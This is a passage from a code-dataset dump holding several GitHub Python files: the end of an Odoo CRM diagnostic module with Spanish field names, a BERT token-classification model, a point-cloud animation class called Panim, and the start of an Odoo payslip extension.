TEXT_VALUATION.get(score)\n suggestion, area = self.get_sugestion(field.name, score)\n if area:\n values = {\n 'name': field.field_description,\n 'respuesta': answer,\n 'puntaje': score,\n 'area': area,\n 'sugerencia': suggestion,\n 'valoracion': valuation,\n }\n lines_dict.append({area:values})\n if score and area:\n puntaje += score\n if field.ttype == 'many2many' and field.name in M2M_FIELDS:\n if field.name == 'x_forma51':\n continue\n answers = getattr(lead, field.name)\n score = 0\n for answer in answers:\n score += answer.puntaje\n if score > 5:\n score = 5\n valuation = TEXT_VALUATION.get(score)\n suggestion, area = self.get_sugestion(field.name, score)\n if area:\n values = {\n 'name': field.field_description,\n 'respuesta': answers,\n 'puntaje': score,\n 'area': area,\n 'sugerencia': suggestion,\n 'valoracion': valuation,\n }\n lines_dict.append({area:values})\n if score and area:\n puntaje += score\n self.set_diagnostico(puntaje, lead)\n return lines_dict\n\n # set diagnostico based on range\n @api.model\n def set_diagnostico(self, score, lead):\n _logger.info(score)\n for k, v in RANGES.items():\n if score in v:\n lead.diagnostico = k\n\n # this method is called from cron\n def relate_events_to_leads(self):\n lead_ids = self.search(\n [('mentors', '=', False),\n ('diagnostico', 'in', ('incipiente', 'confiable', 'competente'))])\n if not lead_ids:\n return\n event_ids = event_ids = self.available_events().sorted(reverse=True)\n if not event_ids:\n return\n for lead in lead_ids:\n if event_ids and lead_ids:\n event_ids[0].opportunity_id = lead.id\n lead.mentors = event_ids[0].partner_ids[0]\n self.send_mail_notification(lead)\n event_ids -= event_ids[0]\n lead_ids -= lead\n self.env.cr.commit()\n\n #fecha para cambio de permisos\n \n def valide_fecha(self):\n fecha = self.env['res.company'].browse([1])\n fecha_hoy = datetime.today().date()\n print(fecha.fechalimite, fecha_hoy)\n if fecha.fechalimite < fecha_hoy:\n print(\"entas111\")\n rol = self.env['res.users.role'].search([('role_type' , '=', \"facilitador\")])\n lista_permisos =[]\n lista_permisos1 =[]\n for roles in rol:\n for grupo in roles.implied_ids:\n if grupo.name == \"Usuario: Solo mostrar documentos propios\":\n print(\"perm\")\n lista_permisos.append((5,grupo.id))\n else:\n permiso_de_inactivacion = self.env['res.groups'].search([('name', '=', 'Usuario: Inactivar CRM')])\n lista_permisos1.append((4, permiso_de_inactivacion.id))\n lista_permisos1.append((4,grupo.id))\n \n \n \n print(lista_permisos)\n rol.write({\"implied_ids\" : lista_permisos})\n rol.write({\"implied_ids\" : lista_permisos1})\n\n\n\n\n # send email notification to coordinador and facilitador\n @api.model\n def send_mail_notification(self, lead_id):\n try:\n template_id = self.env.ref('crm_diagnostic.q_mail_template_event_notification')\n template_id.send_mail(lead_id.id, force_send=False)\n except Exception as e:\n print(e)\n\n # return events availables\n def available_events(self):\n week_days = range(1, 6)\n date_to_search = fields.Datetime.now().replace(hour=0, minute=0) + timedelta(days=1)\n events = self.env['calendar.event'].search(\n [('start_datetime', '>', date_to_search),\n ('opportunity_id', '=', False)])\n _logger.info(events)\n for event in events:\n if event.start_datetime.weekday() not in week_days:\n events -= event\n _logger.info(len(events))\n return events\n\n # returning area and suggestion base on field_name and score\n @api.model\n def get_sugestion(self, field_name, score):\n # suggestion = False\n # area = False\n # TODO if any param comes in False we immediatly return values in False\n # if not score or not field_name:\n # return suggestion, area\n if field_name in SUGGEST_VALUATION:\n suggestion = SUGGEST_VALUATION[field_name].get(score, False)\n area = SUGGEST_VALUATION[field_name].get('area', False)\n return suggestion, area\n\n @api.model\n def action_to_return_to_crm_diagnostic(self, crm_diagnostic_id):\n search_view = self.env.ref('crm_diagnostic.crm_diagnostic_view')\n return {\n 'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'res_model': 'crm.diagnostic',\n 'res_id': crm_diagnostic_id.id,\n 'views': [(search_view.id, 'form')],\n 'view_id': search_view.id,\n 'target': 'current',\n 'flags': {'mode': 'readonly', 'action_buttons': True},\n }\n\n##########################################################################\n# ROLE METHODS\n##########################################################################\n\n # set the current user\n @api.depends('current_user')\n def get_current_user(self):\n for lead in self:\n lead.current_user = self.env.user.id\n\n # check if the current user is facilitator\n @api.depends('current_user')\n def current_user_is_facilitator(self):\n for lead in self:\n if lead.is_facilitator():\n lead.current_user_facilitator = True\n else:\n lead.current_user_facilitator = False\n \n # check if the curren user is mentor\n @api.depends('current_user')\n def current_user_is_mentor(self):\n for lead in self:\n if lead.is_mentor():\n lead.current_user_mentor = True\n else:\n lead.current_user_mentor = False\n\n @api.depends('current_user')\n def current_user_is_admin(self):\n for lead in self:\n if lead.is_admin():\n lead.current_user_admin = True\n else:\n lead.current_user_admin = False\n \n @api.depends('user_id')\n def get_facilitator_role(self):\n for lead in self:\n facilitator_roles = lead.user_id.role_ids\n if facilitator_roles:\n facilitator_role = facilitator_roles[0].name\n\n if facilitator_role:\n lead.facilitator_role = facilitator_role\n else:\n lead.facilitator_role = ''\n else:\n lead.facilitator_role = ''\n\n @api.depends()\n def compute_show_action_set_rainbowman(self):\n for lead in self:\n if lead.stage_id.allow_mark_as_won:\n lead.show_action_set_rainbowman = True\n else:\n lead.show_action_set_rainbowman = False\n\n\n\n # check if the current user is admin user\n @api.depends('current_user')\n def current_user_is_root(self):\n for lead in self:\n try:\n root = self.env.ref('base.user_admin').id\n if root == lead.current_user.id or lead.is_cordinator() or lead.is_orientador():\n lead.root_current_user = True\n else:\n lead.root_current_user = False\n except Exception as e:\n lead.root_current_user = False\n print(e)\n\n def write(self, values):\n if len(values) == 1 and 'stage_id' in values:\n if self.is_facilitator():\n raise ValidationError(\"No tienes permiso para cambiar de etapa directamente. {}\".format(values))\n return super(CrmLead, self).write(values)\n\n\n # return the field list to validate the module1\n def fields_module1(self):\n return [\n 'x_datos1', 'attach_file', \"x_nombre_negocio\", \"x_nombre\", \"doctype\",\n \"x_identification\", \"x_sexo\", \"x_edad1\", \"state_id\", \"xcity\", \"x_dir_res\",\n \"x_comuna\", \"x_vereda\", \"x_ubicacion_negocio\", \"mobile\", \"x_estrato\", \n \"x_pobl_esp1\", \"x_tipo_vivienda\", \"x_no_personas_viven_propietario\", \"x_etnia\", \"x_sisben\",\n \"x_afiliado1\", \"x_escolaridad\", \"x_ubic\", \"x_com_cuenta1\", \"x_tien_dur\", \"x_herramientas\", \"x_depend\"\n ]\n\n # return the field list to validate the module2\n def fields_module2(self):\n return ['x_cont1', 'first_module_ready']\n \n def fields_module3(self):\n return ['third_module_ready']\n\n # methos that return list of fields by section\n def fields_module3_generalities(self):\n return [\n 'x_datos3'\n ]\n\n # MÓDULO 3 INNOVACIÓN, OPERACIÓN Y ORGANIZACIÓN\n def fields_module3_inno_org_op(self):\n return [\n 'x_innova_org_1', 'x_innova_org_2', 'x_innova_org_3',\n 'x_innova_org_4', 'x_innova_org_5', 'x_innova_org_6',\n ]\n\n #MODULO 3 MODELO DE NEGOCIOS\n def fields_module3_business_model(self):\n return [\n 'x_neg4', 'x_neg6', 'x_neg7',\n 'x_neg8', 'x_neg14',\n ]\n\n #MODELO 3 FINANCIERO\n def fields_module3_financial(self):\n return [\n 'x_financiero18', 'x_financiero20', 'x_financiero21',\n 'x_financiero22', 'x_financiero23', 'x_financiero24',\n 'x_financiero25',\n ]\n\n #MODELO 3 MERCADEO\n def fields_module3_marketing(self):\n return [\n 'x_neg5', 'x_mer_com30', 'x_mer_com31',\n 'x_mer_com32', 'x_mer_com34', 'x_mer_com38',\n 'x_mer_com39',\n ]\n\n #MODELO 3 FORMALIZACION\n def fields_module3_formalization(self):\n return [\n 'x_forma44', 'x_forma45', 'x_forma46',\n 'x_forma47_1', 'x_forma49_1',\n ]\n\n def full_list_field(self):\n full_fields = []\n full_fields.extend(self.fields_module3_generalities())\n full_fields.extend(self.fields_module3_inno_org_op())\n full_fields.extend(self.fields_module3_business_model())\n full_fields.extend(self.fields_module3_financial())\n full_fields.extend(self.fields_module3_marketing())\n full_fields.extend(self.fields_module3_formalization())\n full_fields.extend(['second_module_read'])\n return full_fields\n # ended section\n\n # validating if the current user has the facilitador profile\n def is_facilitator(self):\n role_id = self.env['res.users.role'].sudo().search([('role_type', '=', 'facilitador')])\n for role in role_id:\n if any(user.id == self.env.user.id for user in role.line_ids.mapped('user_id')):\n return True\n return False\n\n # validating if the current user has the cordinator profile\n def is_cordinator(self):\n role_id = self.env['res.users.role'].sudo().search([('role_type', '=', 'coordinador')])\n for role in role_id:\n if any(user.id == self.env.user.id for user in role.line_ids.mapped('user_id')):\n return True\n return False\n\n # validating if the current user has the mentor profile\n def is_mentor(self):\n role_id = self.env['res.users.role'].sudo().search([('role_type', '=', 'mentor')])\n for role in role_id:\n if any(user.id == self.env.user.id for user in role.line_ids.mapped('user_id')):\n return True\n return False\n \n def is_orientador(self):\n role_id = self.env['res.users.role'].sudo().search([('role_type', '=', 'orientador')])\n for role in role_id:\n if any(user.id == self.env.user.id for user in role.line_ids.mapped('user_id')):\n return True\n return False\n\n def is_admin(self):\n role_id = self.env['res.users.role'].sudo().search([('role_type', '=', 'admin')])\n for role in role_id:\n if any(user.id == self.env.user.id for user in role.line_ids.mapped('user_id')):\n return True\n return False\n\n def is_administrativo(self):\n role_id = self.env['res.users.role'].sudo().search([('role_type', '=', 'administrativo')])\n for role in role_id:\n if any(user.id == self.env.user.id for user in role.line_ids.mapped('user_id')):\n return True\n return False\n\n def is_estudiante(self):\n role_id = self.env['res.users.role'].sudo().search([('role_type', '=', 'estudiante')])\n for role in role_id:\n if any(user.id == self.env.user.id for user in role.line_ids.mapped('user_id')):\n return True\n return False\n\n # computed if the module1 is ok\n @api.depends(fields_module1)\n def compute_first_module(self):\n for lead in self:\n if lead.is_facilitator() or lead.is_admin():\n if lead.all_fields_module1_are_ok():\n lead.first_module_ready = True\n else:\n lead.first_module_ready = False\n elif lead.is_cordinator() or lead.is_orientador() or lead.is_mentor() or lead.is_admin():\n lead.first_module_ready = True\n else:\n lead.first_module_ready = False\n\n # computed if the module2 is ok\n @api.depends(fields_module2)\n def compute_second_module(self):\n for lead in self:\n if (lead.is_facilitator() or lead.is_admin()) and lead.first_module_ready:\n if lead.all_fields_module2_are_ok():\n lead.second_module_read = True\n else:\n lead.second_module_read = False\n elif lead.is_cordinator() or lead.is_orientador() or lead.is_mentor() or lead.is_admin():\n lead.second_module_read = True\n else:\n lead.second_module_read = False\n\n # computed if the module3 is ok\n @api.depends(full_list_field)\n def compute_third_module(self):\n for lead in self:\n if (lead.is_facilitator() or lead.is_admin()) and lead.second_module_read:\n if lead.all_fields_module3_are_ok():\n lead.third_module_ready = True\n else:\n lead.third_module_ready = False\n elif lead.is_cordinator() or lead.is_orientador() or lead.is_mentor() or lead.is_admin():\n lead.third_module_ready = True\n else:\n lead.third_module_ready = False\n\n @api.depends(\"stage_id\")\n def compute_four_module(self):\n for lead in self:\n if (lead.is_facilitator() or lead.is_admin()) and lead.third_module_ready:\n if lead.stage_id.stage_state == \"cuarto_encuentro\":\n lead.four_module_read = True\n else:\n lead.four_module_read = False\n elif lead.is_cordinator() or lead.is_orientador() or lead.is_mentor() or lead.is_admin():\n lead.four_module_read = True\n else:\n lead.four_module_read = False\n\n # validating it all fields of module3 were filled\n def all_fields_module3_are_ok(self):\n result = []\n result.append(self.check_inno_org_op(self.fields_module3_inno_org_op()))\n result.append(self.check_business_model_fields(self.fields_module3_business_model()))\n result.append(self.check_financial_fields(self.fields_module3_financial()))\n result.append(self.check_marketing_fields(self.fields_module3_marketing()))\n result.append(self.check_formalization_fields(self.fields_module3_formalization()))\n if any(r == False for r in result):\n return False\n else:\n return True\n\n # checking if all generalities field section are ok\n def check_generalities_fields(self, fields):\n if any(not getattr(self, field) for field in fields):\n return False\n else:\n return True\n\n # cheking if all innovation fields section are ok\n def check_inno_org_op(self, fields):\n if any(not getattr(self, field) for field in fields):\n return False\n else:\n return True\n\n # checking if all business model field section are ok\n def check_business_model_fields(self, fields):\n if any(not getattr(self, field) for field in fields):\n return False\n else:\n return True\n\n # checking if all financial field section are ok\n def check_financial_fields(self, fields):\n if any(not getattr(self, field) for field in fields):\n return False\n else:\n return True\n\n # checking if all marketing field section are ok\n def check_marketing_fields(self, fields):\n if any(not getattr(self, field) for field in fields):\n return False\n else:\n return True\n\n # checking if all formalization field section are ok\n def check_formalization_fields(self, fields):\n if any(not getattr(self, field) for field in fields):\n return False\n else:\n return True\n\n # validating it all fields of module1 were filled\n def all_fields_module1_are_ok(self):\n fields = self.fields_module1()\n if any(not getattr(self, field) for field in fields):\n return False\n else:\n return True\n\n # validating it all fields of module2 were filled\n def all_fields_module2_are_ok(self):\n if getattr(self, 'x_cont1') and getattr(self, 'x_cont1') == 'si':\n return True\n elif (getattr(self, 'x_cont1') and getattr(self, 'x_cont1') == 'no') and getattr(self, 'x_cont1_por'):\n return False\n else:\n return False\n\n # getting the stage by stage state\n @api.model\n def get_stage(self, stage_state):\n stage_id = self.env['crm.stage'].sudo().search([('stage_state', '=', stage_state)], limit=1)\n return stage_id\n\n # change the stage on lead according if the question modules\n @api.onchange('first_module_ready', 'second_module_read', 'third_module_ready')\n def update_stage(self):\n if (self.is_facilitator() or self.is_cordinator()):\n if self.first_module_ready:\n second_stage = self.get_stage('segundo_encuentro')\n self.with_user(SUPERUSER_ID).stage_id = second_stage if second_stage else self.stage_id\n if self.first_module_ready and self.second_module_read:\n third_stage = self.get_stage('tercer_encuentro')\n self.with_user(SUPERUSER_ID).stage_id = third_stage if third_stage else self.stage_id\n if self.first_module_ready and self.second_module_read and self.third_module_ready:\n fourth_stage = self.get_stage('espera_de_plan')\n self.with_user(SUPERUSER_ID).stage_id = fourth_stage if fourth_stage else self.stage_id\n\n # inherit method to validate if the current user has the cordinator profile\n # if so then we set readonly=False on mentors field\n @api.model\n def fields_view_get(\n self, view_id=None, view_type='form', toolbar=False,\n submenu=False):\n print(\"ejecutas\"*100)\n res = super(CrmLead, self).fields_view_get(\n view_id=view_id, view_type=view_type, toolbar=toolbar,\n submenu=submenu)\n if view_type == 'form':\n doc = etree.XML(res['arch'])\n if self.is_cordinator():\n for node in doc.xpath(\"//field[@name='mentors']\"):\n if 'modifiers' in node.attrib:\n modifiers = json.loads(node.attrib['modifiers'])\n modifiers['readonly'] = False\n node.attrib['modifiers'] = json.dumps(modifiers)\n if 'options' in node.attrib:\n options = json.loads(node.attrib['options'])\n options['no_create'] = True\n options['no_open'] = True\n node.attrib['options'] = json.dumps(options)\n\n #res['arch'] = etree.tostring(doc)\n if self.is_facilitator():\n print(doc, \"Facilitadorñññññññññññññññññññññññññññññññññññññññññññññññññññññññññññññ\")\n for node in doc.xpath(\"//header/field[@name='stage_id']\"):\n print(node.attrib)\n if 'options' in node.attrib:\n node.attrib.pop('options')\n print(node.attrib)\n\n #res['arch'] = etree.tostring(doc)\n\n for node in doc.xpath(\"//field[@name='mentors']\"):\n if not 'options' in node.attrib:\n options = json.loads(node.attrib['options'])\n options['no_create'] = False\n options['no_open'] = False\n node.attrib['options'] = json.dumps(options)\n\n if not self.is_mentor():\n if not self.is_admin():\n if not self.is_facilitator():\n for node in doc.xpath(\"//header/button[@name='action_set_won_rainbowman']\"):\n if 'modifiers' in node.attrib:\n modifiers = json.loads(node.attrib['modifiers'])\n modifiers['invisible'] = True\n node.attrib['modifiers'] = json.dumps(modifiers)\n\n # res['arch'] = etree.tostring(doc)\n\n if not self.is_mentor():\n if not self.is_admin():\n if not self.is_facilitator():\n for node in doc.xpath(\"//header/field[@name='stage_id']\"):\n if 'modifiers' in node.attrib:\n modifiers = json.loads(node.attrib['modifiers'])\n modifiers['readonly'] = True\n node.attrib['modifiers'] = json.dumps(modifiers)\n\n res['arch'] = etree.tostring(doc)\n #import pdb; pdb.set_trace()\n return res\n\n @api.onchange('x_nombre_negocio')\n def _onchange_x_nombre_negocio(self):\n if self.x_nombre_negocio:\n self.x_nombre_negocio = str(self.x_nombre_negocio).upper()\n\n @api.onchange('name')\n def _onchange_name(self):\n chars = ['!', '\"', '#', '$', '%', '&', \"'\", '(', ')', '*', '+', ',', '-', '.', '/', '\\\\', ':', ';', '<', '=', '>', '?', '@', '[', ']', '^', '_', '`', '{', '|', '}', '~']\n delimiter = ''\n for char in chars:\n if char in str(self.name) :\n raise ValidationError(('No se permiten caracteres especiales en el Nombre del Propietario: {}'.format(delimiter.join(chars))))\n \n @api.onchange('x_nombre')\n def _onchange_x_nombre(self):\n chars = ['!', '\"', '#', '$', '%', '&', \"'\", '(', ')', '*', '+', ',', '-', '.', '/', '\\\\', ':', ';', '<', '=', '>', '?', '@', '[', ']', '^', '_', '`', '{', '|', '}', '~']\n delimiter = ''\n for char in chars:\n if char in str(self.x_nombre) :\n raise ValidationError(('No se permiten caracteres especiales en el Nombre del Propietario: {}'.format(delimiter.join(chars))))\n##########################################################################\n# ATTENTION PLAN METHODS\n##########################################################################\n crm_attenation_plan_ids = fields.One2many(\n 'crm.attention.plan',\n 'lead_id',\n copy=False)\n\n # returning an action to go to crm.attention.plan form view related to lead\n def call_action_crm_attention_plan(self):\n for record in self:\n # validating if it is necessary to create a new attention plan record or return the first on the list\n if len(record.crm_attenation_plan_ids) > 0:\n return record.action_to_return_to_crm_attention_plan(record.crm_attenation_plan_ids[0])\n else:\n if len(record.crm_lead_id) <= 0:\n # we avoid to execute the attention plan whether diagnostic haven't executed yet\n raise ValidationError('No puede realizar el plan de atención sin antes haber realizado el diagnostico.')\n attention_plan_vals = record.getting_values_to_crm_attention_plan()\n crm_attention_id = self.env['crm.attention.plan'].create(attention_plan_vals)\n #record.plan_line_ids = attention_plan_vals['plan_line_ids']\n crm_attention_id.diagnostico = record.diagnostico\n print(attention_plan_vals)\n record.plan_line_ids = attention_plan_vals['plan_line_ids']\n return record.action_to_return_to_crm_attention_plan(crm_attention_id)\n\n # return a dic values for crm.diagnostic\n def getting_values_to_crm_attention_plan(self):\n for lead in self:\n dic_vals = {\n 'lead_id': lead.id,\n 'nombre_negocio': lead.x_nombre_negocio,\n 'ubicacion': lead.x_dir_neg,\n 'fecha': fields.Date.today(),\n 'plan_line_ids': lead.get_attention_plan_lines()\n }\n return dic_vals\n\n def get_attention_plan_lines(self):\n lines = []\n items = ['48 H', '1 Semana', '2 Semanas', '1 Mes', 'A futuro', 'Hábitos a desarrollar']\n for item in items:\n lines.append(\n (0, 0, {\n 'prioridad': item,\n 'actividades': False,\n 'soluciones': False,\n 'reponsable': False,\n }))\n return lines\n\n @api.model\n def action_to_return_to_crm_attention_plan(self, crm_attention_id):\n form_view = self.env.ref('crm_diagnostic.q_crm_attention_plan_form_view')\n return {\n 'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'res_model': 'crm.attention.plan',\n 'res_id': crm_attention_id.id,\n 'views': [(form_view.id, 'form')],\n 'view_id': form_view.id,\n 'target': 'current',\n }\n","repo_name":"ernesto-medina/diagnostico_odoo","sub_path":"crm_diagnostic/models/crm_lead.py","file_name":"crm_lead.py","file_ext":"py","file_size_in_byte":51679,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"740986668","text":"from transformers import BertModel,BertPreTrainedModel\nimport torch\nimport torch.nn as nn\nfrom torch.nn import CrossEntropyLoss, KLDivLoss\n\nclass BERTForTokenClassification_v2(BertPreTrainedModel):\n\n def __init__(self, config):\n super().__init__(config)\n self.num_labels = config.num_labels\n\n self.embedding = nn.Linear(20, config.hidden_size)\n self.bert = BertModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(config.hidden_size, config.num_labels)\n\n self.init_weights()\n\n \n def forward(self, field_embeds,input_ids=None, attention_mask=None, token_type_ids=None,\n position_ids=None, head_mask=None, inputs_embeds=None, labels=None, label_mask=None):\n\n bert_embedding = self.get_input_embeddings() \n # embedding object \n # see more: https://pytorch.org/docs/stable/generated/torch.nn.Embedding.html\n\n embeds_1 = bert_embedding(input_ids) \n embeds_2 = self.embedding(field_embeds)\n inputs_embeds = torch.add(embeds_1,embeds_2)\n\n outputs = self.bert(input_ids=None,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds)\n\n sequence_output = outputs[0]\n\n sequence_output = self.dropout(sequence_output)\n logits = self.classifier(sequence_output)\n\n outputs = (logits,sequence_output) + outputs[2:] # add hidden states and attention if they are here\n loss_dict = {}\n if labels is not None:\n # logits = self.logsoftmax(logits)\n # Only keep active parts of the loss\n active_loss = True\n if attention_mask is not None:\n active_loss = attention_mask.view(-1) == 1\n # active_loss = True\n # if attention_mask is not None:\n # active_loss = attention_mask.view(-1) == 1\n # if label_mask is not None:\n # active_loss = active_loss & label_mask.view(-1)\n # active_logits = logits.view(-1, self.num_labels)[active_loss]\n \n for key in labels:\n label = labels[key]\n if label is None:\n continue\n # if key==\"pseudo\" and label_mask is not None:\n if label_mask is not None:\n all_active_loss = active_loss & label_mask.view(-1)\n else:\n all_active_loss = active_loss\n active_logits = logits.view(-1, self.num_labels)[all_active_loss]\n\n if label.shape == logits.shape:\n loss_fct = KLDivLoss()\n # loss_fct = SoftFocalLoss(gamma=2)\n if attention_mask is not None or label_mask is not None:\n active_labels = label.view(-1, self.num_labels)[all_active_loss]\n loss = loss_fct(active_logits, active_labels)\n else:\n loss = loss_fct(logits, label)\n else:\n loss_fct = CrossEntropyLoss()\n # loss_fct = FocalLoss(gamma=2)\n # loss_fct = NLLLoss()\n if attention_mask is not None or label_mask is not None:\n active_labels = label.view(-1)[all_active_loss]\n loss = loss_fct(active_logits, active_labels)\n else:\n loss = loss_fct(logits.view(-1, self.num_labels), label.view(-1))\n loss_dict[key] = loss\n\n\n outputs = (loss_dict,) + outputs\n return outputs # (loss), scores, (hidden_states), (attentions)\n","repo_name":"THU-KEG/MOOC-NER","sub_path":"DS-MOCE/Self-train/models/modeling_bert.py","file_name":"modeling_bert.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"72308921844","text":"import numpy as np\nfrom ..utilities import load_json_file, write_to_json_file\n\n\nclass Panim(object):\n \"\"\" A customized animation data format for point cloud data. It is also used in Unity.\n \"\"\"\n\n def __init__(self):\n self.motion_data = None\n self.has_skeleton = False\n self.skeleton = None\n \n def load(self, filename):\n \"\"\"\n \n Arguments:\n filename {str} -- path to .panim file\n \"\"\"\n json_data = load_json_file(filename)\n self.motion_data = json_data['motion_data']\n self.has_skeleton = json_data['has_skeleton']\n self.skeleton = json_data['skeleton']\n \n def save(self, saveFilename):\n \"\"\"\n \n Arguments:\n saveFilename {str} -- save path\n \"\"\"\n if self.has_skeleton:\n output_data = {'motion_data': self.motion_data.tolist(),\n 'has_skeleton': self.has_skeleton,\n 'skeleton': self.skeleton\n }\n else:\n output_data = {'motion_data': self.motion_data.tolist(),\n 'has_skeleton': self.has_skeleton\n }\n write_to_json_file(saveFilename, output_data)\n \n def setSkeleton(self, ske_description):\n \"\"\"list of joints\n \n Arguments:\n ske_description {list} -- a list of dictionary for joint information\n \"\"\"\n self.skeleton = ske_description\n self.has_skeleton = True\n\n def setMotionData(self, motion_data):\n \"\"\"\n \n Arguments:\n motion_data {numpy.array3d} -- n_frames * n_joints * 3\n \"\"\"\n self.motion_data = motion_data\n \n def scale_motion(self, scale_factor):\n if self.motion_data is not None:\n self.motion_data = np.asarray(self.motion_data) * scale_factor\n\n def convert_to_unity_format(self, scale=1.0):\n \"\"\" \n Convert motion_data from numpy array to dictionary for Unity loading. The coordinate system is flipped because Unity use left-hand coordinate system\n \"\"\"\n output_frames = []\n for frame in self.motion_data:\n world_pos = []\n for point in frame:\n world_pos.append({'x': -point[0] * scale,\n 'y': point[1] * scale,\n 'z': point[2] * scale})\n output_frame = {'WorldPos': world_pos}\n output_frames.append(output_frame)\n ## update motion_data\n self.motion_data = output_frames \n\n def get_joint_index(self, joint_name):\n for i in range(len(self.skeleton)):\n if self.skeleton[i]['name'] == joint_name:\n return self.skeleton[i]['index']\n return None\n\n def mirror(self, joint_mapping=None):\n \"\"\"[summary]\n \n Arguments:\n joint_mapping {[type]} -- [description]\n \"\"\"\n assert self.skeleton is not None\n motion_data = np.asarray(self.motion_data)\n mirrored_data = np.zeros(motion_data.shape)\n if joint_mapping is None: \n for i in range(len(self.skeleton)):\n if 'Left' in self.skeleton[i]['name']:\n mirrored_joint_name = self.skeleton[i]['name'].replace(\"Left\", \"Right\")\n mirrored_joint_index = self.get_joint_index(mirrored_joint_name)\n\n mirrored_data[:, self.skeleton[i]['index'], :] = motion_data[:, mirrored_joint_index, :]\n mirrored_data[:, self.skeleton[i]['index'], 0] = - mirrored_data[:, self.skeleton[i]['index'], 0]\n elif 'Right' in self.skeleton[i]['name']:\n mirrored_joint_name = self.skeleton[i]['name'].replace(\"Right\", \"Left\")\n mirrored_joint_index = self.get_joint_index(mirrored_joint_name)\n mirrored_data[:, self.skeleton[i]['index'], :] = motion_data[:, mirrored_joint_index, :]\n mirrored_data[:, self.skeleton[i]['index'], 0] = - mirrored_data[:, self.skeleton[i]['index'], 0]\n ### handle special \n elif self.skeleton[i]['name'] == \"RThumb\":\n mirrored_joint_name = \"LThumb\"\n mirrored_joint_index = self.get_joint_index(mirrored_joint_name)\n mirrored_data[:, self.skeleton[i]['index'], :] = motion_data[:, mirrored_joint_index, :]\n mirrored_data[:, self.skeleton[i]['index'], 0] = - mirrored_data[:, self.skeleton[i]['index'], 0] \n elif self.skeleton[i]['name'] == \"LThumb\":\n mirrored_joint_name = \"RThumb\"\n mirrored_joint_index = self.get_joint_index(mirrored_joint_name)\n mirrored_data[:, self.skeleton[i]['index'], :] = motion_data[:, mirrored_joint_index, :]\n mirrored_data[:, self.skeleton[i]['index'], 0] = - mirrored_data[:, self.skeleton[i]['index'], 0] \n else:\n mirrored_data[:, self.skeleton[i]['index'], :] = motion_data[:, self.skeleton[i]['index'], :]\n mirrored_data[:, self.skeleton[i]['index'], 0] = - mirrored_data[:, self.skeleton[i]['index'], 0]\n else:\n pass\n return mirrored_data","repo_name":"dhhjx880713/mosi_utils_anim","sub_path":"animation_data/panim.py","file_name":"panim.py","file_ext":"py","file_size_in_byte":5348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"36518538122","text":"import time\nfrom datetime import datetime, timedelta, date, time\nfrom pytz import timezone\n\nfrom odoo import api, fields, models, tools, _\nfrom odoo.addons import decimal_precision as dp\nfrom odoo.exceptions import UserError, ValidationError\n\n\nclass Payslipline(models.Model):\n _inherit = 'hr.payslip.line'\n\n # @api.one\n def compute_remuneration(self):\n res = {}\n total = 0\n for slip_line in self:\n if slip_line.total >= 0:\n slip_line.remuneration = slip_line.total\n else:\n slip_line.remuneration = 0\n return total\n\n # @api.one\n def compute_deduction(self):\n total = 0\n for slip_line in self:\n if slip_line.total < 0:\n slip_line.deduction = abs(slip_line.total)\n else:\n slip_line.deduction = 0\n # self.deduction = total\n return total\n\n remuneration = fields.Float(compute=compute_remuneration, digits=(10, 2), string='Remuneration')\n deduction = fields.Float(compute=compute_deduction, digits=(10, 2), string='Deduction')\n\n\nclass Payslip(models.Model):\n _inherit = 'hr.payslip'\n\n user_id = fields.Many2one(\"res.users\", string=\"User\", default=lambda self: self.env.user)\n\n @api.onchange('struct_id')\n def _onchange_structure(self):\n structure = self.struct_id and self.struct_id.id or None\n input_records = self.env['hr.payslip.input.type'].search([])\n aa = input_records.mapped(lambda i: i.id)\n input_list = [x.id for x in input_records if\n (len(x.struct_ids) == 0 or structure and structure in x.struct_ids.mapped(lambda i: i.id))]\n self.input_line_ids = [(5, 0, 0)]\n for input_record in input_list:\n self.input_line_ids = [(0, 0, {'input_type_id': input_record, 'amount': 0.0})]\n\n # @api.model\n # def get_worked_day_lines(self, contracts, date_from, date_to):\n # \"\"\"\n # @param contract: Browse record of contracts\n # @return: returns a list of dict containing the input that should be applied for the given contract between date_from and date_to\n # \"\"\"\n # res = []\n # # fill only if the contract as a working schedule linked\n # for contract in contracts.filtered(lambda contract: contract.resource_calendar_id):\n # day_from = datetime.combine(fields.Date.from_string(date_from), time.min)\n # day_to = datetime.combine(fields.Date.from_string(date_to), time.max)\n #\n # # compute leave days\n # leaves = {}\n # calendar = contract.resource_calendar_id\n # tz = timezone(calendar.tz)\n # day_leave_intervals = contract.employee_id.list_leaves(day_from, day_to,\n # calendar=contract.resource_calendar_id)\n # for day, hours, leave in day_leave_intervals:\n # holiday = leave.holiday_id\n # current_leave_struct = leaves.setdefault(holiday.holiday_status_id, {\n # 'name': holiday.holiday_status_id.name or _('Global Leaves'),\n # 'sequence': 5,\n # 'code': holiday.holiday_status_id.name or 'GLOBAL',\n # 'number_of_days': 0.0,\n # 'number_of_hours': 0.0,\n # 'contract_id': contract.id,\n # })\n # current_leave_struct['number_of_hours'] += hours\n # work_hours = calendar.get_work_hours_count(\n # tz.localize(datetime.combine(day, time.min)),\n # tz.localize(datetime.combine(day, time.max)),\n # compute_leaves=False,\n # )\n # if work_hours:\n # current_leave_struct['number_of_days'] += hours / work_hours\n #\n # # compute worked days\n # work_data = contract.employee_id.get_work_days_data(day_from, day_to,\n # calendar=contract.resource_calendar_id)\n # employee_period = {\n # 'name': _(\"Normal Working Days paid at 100%\"),\n # 'sequence': 1,\n # 'code': 'WORK100',\n # 'number_of_days': work_data['days'],\n # 'number_of_hours': work_data['hours'],\n # 'contract_id': contract.id,\n # }\n #\n # res.append(employee_period)\n #\n # full_period = {\n # 'name': _(\"Full working days of the period\"),\n # 'sequence': 1,\n # 'code': 'PERIOD',\n # 'number_of_days': work_data['days'],\n # 'number_of_hours': work_data['hours'],\n # 'contract_id': contract.id,\n # }\n #\n # res.append(full_period)\n #\n # res.extend(leaves.values())\n # return res\n\n # @api.one\n def 